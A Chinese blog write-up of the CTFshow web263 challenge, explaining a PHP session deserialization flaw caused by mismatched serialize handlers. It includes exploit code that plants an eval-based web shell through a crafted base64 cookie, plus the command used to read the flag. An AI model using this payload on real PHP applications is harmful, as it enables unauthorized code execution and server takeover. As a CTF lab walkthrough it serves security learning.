CTFshow 反序列化 web263

最新推荐文章于 2023-04-08 16:02:07 发布
最新推荐文章于 2023-04-08 16:02:07 发布
阅读量1.1k 收藏 2
点赞数 7
分类专栏: CTFshow 文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kracxi/article/details/122024812
版权

目录

源码

也没有什么别的信息,扫一下目录,下载www.zip拿到源码

思路

知识点:
  1. php在session存储和读取时,都会有一个序列化和反序列化的过程,PHP内置了多种处理器用于存取$_SESSION数据,都会对数据序列化和反序列化,源码中有session_start的时候会读取session,从而进行反序列化.
  2. php . ini 中默认 session.serialize_handler 为 php_serialize,而 index.php 中将其设置为 php ,这个差异就导致了 sesssion 反序列化问题。
  3. php有三种处理器对$_SESSION数据进行序列化和反序列化。

php_binary 键名的长度对应的ascii字符+键名+经过serialize()函数序列化后的值
php 键名+竖线(|)+经过serialize()函数处理过的值
php_serialize 经过serialize()函数处理过的值,会将键名和值当作一个数组序列化

先找几个关键点

index.php

$_SESSION['limti']键名写错了,应该是limit,所以永远不成立,我们可以通过$_SESSION['limit']=base64_decode($_COOKIE['limit'])来控制session的值

	session_start();
	//超过5次禁止登陆
	if(isset($_SESSION['limit'])){
		$_SESSION['limti']>5?die("登陆失败次数超过限制"):$_SESSION['limit']=base64_decode($_COOKIE['limit']);
		$_COOKIE['limit'] = base64_encode(base64_decode($_COOKIE['limit']) +1);
			}else{
		 setcookie("limit",base64_encode('1'));
		 $_SESSION['limit']= 1;
	}

在check.php中我们发现了require_once 'inc/inc.php';,进入inc.php

发现在User类的魔术方法中可以写入文件,虽然没有给让我们进行反序列化的代码,不过ini_set('session.serialize_handler', 'php');,把session.serialize_handler设置为了php,和index.php不一致,可以利用它来反序列化.

php . ini 中默认 session.serialize_handler 为 php_serialize,而 index.php 中将其设置为 php ,这个差异就导致了 sesssion 反序列化问题。

ini_set('session.serialize_handler', 'php');
session_start();
class User{
    public $username;
    public $password;
    public $status;
    function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
    function setStatus($s){
        $this->status=$s;
    }
    function __destruct(){
        file_put_contents("log-".$this->username, "使用".$this->password."登陆".($this->status?"成功":"失败")."----".date_create()->format('Y-m-d H:i:s'));
    }
}

(盗用下Y1ng师傅的图)
php_serialize

在这里插入图片描述

php
在这里插入图片描述

index.php页面session.serialize_handler为php_serialize,存储在里面的值是经过序列化了的,check.php和inc/inc.php的session.serialize_handler为php,而且用了session_start(),可以读取session文件进行反序列化操作

正常来说在index.php页面存储的session不能正常在check.php和inc/inc.php进行反序列化,但是如果在属性的值中加入|的话 ,在check.php和inc/inc.php页面反序列化的时候|前面的会被看做键名,会对|后面的进行反序列化

在本地构造一下,可以通过base64编码后在index.php页面传入cookie中的limit,让序列化的结果以php_serialize的方式存储进去

<?php
class User{
    public $username='1.php';
    public $password = '<?php echo 123;eval($_POST["Kradress"]);?>';
    // public $status;

    // function setStatus($s){
    //     $this->status=$s;
    // }
    // function __destruct(){
    //     file_put_contents("log-".$this->username, "使用".$this->password."登陆".($this->status?"成功":"失败")."----".date_create()->format('Y-m-d H:i:s'));
    // }
}

//fE86NDoiVXNlciI6Mjp7czo4OiJ1c2VybmFtZSI7czo1OiIxLnBocCI7czo4OiJwYXNzd29yZCI7czo0MjoiPD9waHAgZWNobyAxMjM7ZXZhbCgkX1BPU1RbIktyYWRyZXNzIl0pOz8%2BIjt9
echo  urlencode(base64_encode("|".serialize(new User)));

然后访问check.php或者inc/inc.php,执行session_start()来读取session文件来反序列化,然后当前目录就会生成log-1.php文件,访问回显123,说明我们的代码成功写入,就可以直接getshell了
在这里插入图片描述

题解

<?php
class User{
    public $username='1.php';
    public $password = '<?php echo 123;eval($_POST["Kradress"]);?>';
    // public $status;

    // function setStatus($s){
    //     $this->status=$s;
    // }
    // function __destruct(){
    //     file_put_contents("log-".$this->username, "使用".$this->password."登陆".($this->status?"成功":"失败")."----".date_create()->format('Y-m-d H:i:s'));
    // }
}

echo  urlencode(base64_encode("|".serialize(new User)));
//Cookie:limit=fE86NDoiVXNlciI6Mjp7czo4OiJ1c2VybmFtZSI7czo1OiIxLnBocCI7czo4OiJwYXNzd29yZCI7czo0MjoiPD9waHAgZWNobyAxMjM7ZXZhbCgkX1BPU1RbIktyYWRyZXNzIl0pOz8%2BIjt9
//post:Kradress=?><?=`tac f*`;

在这里插入图片描述

总结

其实还可以在check.php和inc/inc.php页面上传PHP_SESSION_UPLOAD_PROGRESS来解的,PHP_SESSION_UPLOAD_PROGRESS存入session的时候默认以php_serialize的方式,通过把上传文件的filename的值改为| +序列化,然后再check.php和inc/inc.php页面执行session_start也可以反序列化,如果clean up开着的话可以用条件竞争

不过我自己在做Y1ng师傅给的题目的时候发现后面拼接上了一个"tmp_name",导致反序列化失败,具体还不知道原因
在这里插入图片描述

Kradress
关注
  • 7
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
5(web263
weixin_53955759的博客
04-09 2694
进入环境是一个登录界面 查看源码也没有什么东西,试着扫扫看 刚开始没扫出来东西,工具不太行了,看了wp发现是www.zip 访问得到源码 check.php: <?php error_reporting(0); require_once 'inc/inc.php'; $GET = array("u"=>$_GET['u'],"pass"=>$_GET['pass']); if($GET){ $data= $db->get('admin', [ 'id', 'UserNa
shiro反序列化脚本.zip
07-28
需要用到的俩个文件 ysoserial-master.jar 和 poc.py
java反序列化工具
11-21
java反序列化工具,覆盖jboss、weblogic、websphere。
Java反序列化实战.pdf
08-08
本议题将从那些经典案例入手,分析攻击方和防御方的对抗过程。会从fastjson与weblogic的两个经典漏洞,带大家傲游反序列化的世界。 反序列化入门 Fastjson Weblogic 反序列化防御
C# xml序列化和反序列化
最新发布
01-05
C# xml序列化和反序列化
c#序列化和反序列化
05-24
什么叫序列化? 我们都知道对象是暂时保存在内存中的,不能用U盘考走了,有时为了使用介质转移对象,并且把对象的状态保持下来,就需要把对象保存下来,这个过程就叫做序列化,通俗点,就是把人的魂(对象)收伏成一个石子(可传输的介质) 什么叫反序列化? 就是再把介质中的东西还原成对象,把石子还原成人的过程。 在进行这些操作的时候都需要这个可以被序列化,要能被序列化,就得给类头加[Serializable]特性。 通常网络程序为了传输安全才这么做。不知道回答清晰满意否?
ctfshow web入门 反序列化 263
m0_64815693的博客
04-08 1584
ctfshow web入门 反序列化 263
Web反序列化 262~263详解
读书 买花 长大
11-19 1139
262~263
ctfshow web入门反序列化263——学习session的两种存储方式
qq_45766062的博客
09-14 728
一. 题目分析: 跑dirsearch发现有个www.zip压缩包,是网站的源码,通过源码分析,我先梳理解题思路: (1)首先访问首页,建立session,并获得cookie。 (2)然后将cookie修改为反序列化字符串 (3)访问check.php实现反序列化shell的写入 (4)访问log-1.php,获取flag 废话不多说直接上exp: <?php class User{ public $username; public $password; public $sta
CTFshow刷题日记-WEB-反序列化篇(上,254-263)
Love&Share
09-22 2418
反序列化 web254-简单审计 这个题是搞笑的么???? 按着源码顺序走一遍 ...... $username=$_GET['username']; $password=$_GET['password']; if(isset($username) && isset($password)){ $user = new ctfShowUser(); if($user->login($username,$password)){ if($user->c
CTFshow 反序列化
starttv的博客
12-09 731
​Session​一般称为“会话控制“,简单来说就是是一种客户与网站/服务器更为安全的对话方式。一旦开启了session​ 会话,便可以在网站的任何页面使用或保持这个会话,从而让访问者与网站之间建立了一种“对话”机制。不同语言的会话机制可能有所不同,这里仅讨论​机制。​​可以看做是一个特殊的变量,且该变量是用于存储关于用户会话的信息,或者更改用户会话的设置,需要注意的是,​ 变量存储单一用户的信息,并且对于应用程序中的所有页面都是可用的,且其对应的具体session​ 值会存储于服务器端,这也是与。
ctfshow-反序列化
qq_44657899的博客
08-25 3484
文章目录web254web255web256web257web258 web254 正常传参即可index.php?username=xxxxxx&password=xxxxxx web255 <?php class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=true; } $a = new ctfShowUser(); echo urlencod
ctfshow web入门反序列化
qq_53063436的博客
11-06 972
魔术变量: __sleep() //在对象被序列化之前运行 __wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过) __construct() //在类实例化时,会触发进行初始化 __destruct() //对象被销毁时触发 __toString(): //当一个对象被当作字符串使用时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中调用不可访问的方法时触发 __get() //获得一个类的成员变量时调
ctfshow反序列化
njh18790816639的博客
04-18 1068
payload(有效攻击负载)是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码 shellcode(可提权代码) 对于一个漏洞来说,ShellCode就是一个用于某个漏洞的二进制代码框架,有了这个框架你可以在这个ShellCode中包含你需要的Payload来做一些事情 exp (Exploit )漏洞利用,一般是个demo程序 poc(Proof of Concept)漏洞证明,一般就是个样本 用来证明和复现 vul:(Vulnerability) :漏洞 Pwn:是一个
ctfshow web入门 反序列化
Sentiment的博客
12-26 1767
web254
ctfshow—反序列化
cosmoslin的博客
11-15 2045
简介 序列化其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化php 将数据序列化和反序列化会用到两个函数 serialize 将对象格式化成有序的字符串 unserialize 将字符串还原成原来的对象 序列化的目的是方便数据的传输和存储,在PHP中,序列化和反序列化一般用做缓存,比如session缓存,cookie等。 常见的魔术方法 __construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用
CTFshow-WEB入门-反序列化
feng的博客
02-14 5466
前言 简单的反序列化直接给出payload,有意思的,较为复杂的和我不太会的会分析一波。 web254 ?username=xxxxxx&password=xxxxxx web255 <?php class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=true; } echo urlencode(serialize(new ctfShowUser())
CTFShow web入门题刷题记录
打酱油的杯具的博客
11-15 1401
CTFShow web入门题刷题记录(信息搜集) web1 提示:开发注释未及时删除 打开网页查看源代码发现 flag:flag{2b2cf8e3-f880-41e1-a8ff-02601b3d998f} web2 提示:js前台拦截 === 无效操作 打开连接发现无法右键,f12,使用浏览器自带的工具查看(火狐:crtl+u)或者地址前加上view-source: flag:flag{18c9c586-99d5-47b8-8dcc-e404086c3a54} web3 提示:没思路的时候抓个包看看,可能
CTFShow web入门刷题记录-爆破
打酱油的杯具的博客
11-29 2245
CTFShow web入门刷题记录-爆破 web21 先下载提供的密码包,查看hint得知考点为tomcat 账号提示为amdin,点击提交并使用burpsuit抓包 发现底下为一串经过base64编码的文字,翻译后得知为admin: 得知提交格式为:账号:密码 传入intruder,选中并添加$ [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xsSzs95u-1606660930041)(C:/Users/%E8%83%A1%E5%A5%87/AppData/Roami

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值